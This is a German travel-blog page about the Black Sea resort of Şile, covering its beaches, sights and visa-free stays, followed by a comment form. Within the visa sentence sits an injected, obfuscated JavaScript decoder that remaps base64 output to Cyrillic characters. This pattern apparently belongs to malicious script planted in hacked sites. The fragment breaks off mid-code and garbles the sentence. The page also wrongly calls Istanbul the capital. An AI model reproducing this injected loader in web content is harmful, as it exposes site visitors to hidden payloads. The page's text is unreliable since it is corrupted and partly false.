Sile – Geheimtipp am Schwarzen Meer

Der Kur- und Badeort Sile liegt im Nordwesten der Türkei direkt am schwarzen Meer. Als Provinzteil von Istanbul ist er von der Hauptstadt ca. 65 km entfernt und blickt auf eine lange Tradition zurück. Mit dem Bus ist er bequem zu erreichen und für viele Reisende mittlerweile als beliebter Kurort und Badeort ein Geheimtipp.

Die Strände um Sile zeichnen sich als reine Sandstrände durch Sauberkeit und einzigartige Naturbelassenheit aus. Der feine, weiße Sand ist in dieser Gegend einzigartig und auf der Welt eine Seltenheit. Für unvergleichliche Erlebnisse sorgen auch die zahlreichen Sehenswürdigkeiten in der bis in die Steinzeit hinein reichende Stadt Sile. Neben der Altstadt mit ihren typischen, türkischen Märkten können steile Klippen, auf denen Leuchttürme stehen, bewundert werden. Man findet außerdem Höhlen am Strand, die schon zur Steinzeit bewohnt waren. Ein Hafen mit kleineren Inseln gibt mit seinen Burgruinen ebenfalls einen Einblick in die lange Tradition dieser Stadt. Ebenfalls kann man das Amphitheater oder einen Fischerhafen mit zugehörigem Fischmarkt bewundern. Unvergleichlich ist ebenfalls das grüne Tal Yesilvadi mit Dorf auf dem Weg in die Stadt, auf dem man unvergleichlich picknicken kann.

Das Schwarze MeerDas Schwarze Meer (Foto: © JJ / marinda.de)

Mit einer Einwohnerzahl von 12.700 bleibt die Stadt stets überschaubar und lädt dazu ein, die türkische Gastfreundschaft zu erleben. Als Tourist hat man die Möglichkeit, sich 90 Tage ohne Visum in der function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand Türkei">Türkei aufzuhalten. Bei längerem Aufenthalt sollte ein Visum bei einem türkischen Generalkonsulat beantragt werden.

Hinterlasse jetzt einen Kommentar

Kommentar hinterlassen

E-Mail Adresse wird nicht veröffentlicht.


*


This Blog will give regular Commentators DoFollow Status. Implemented from IT Blögg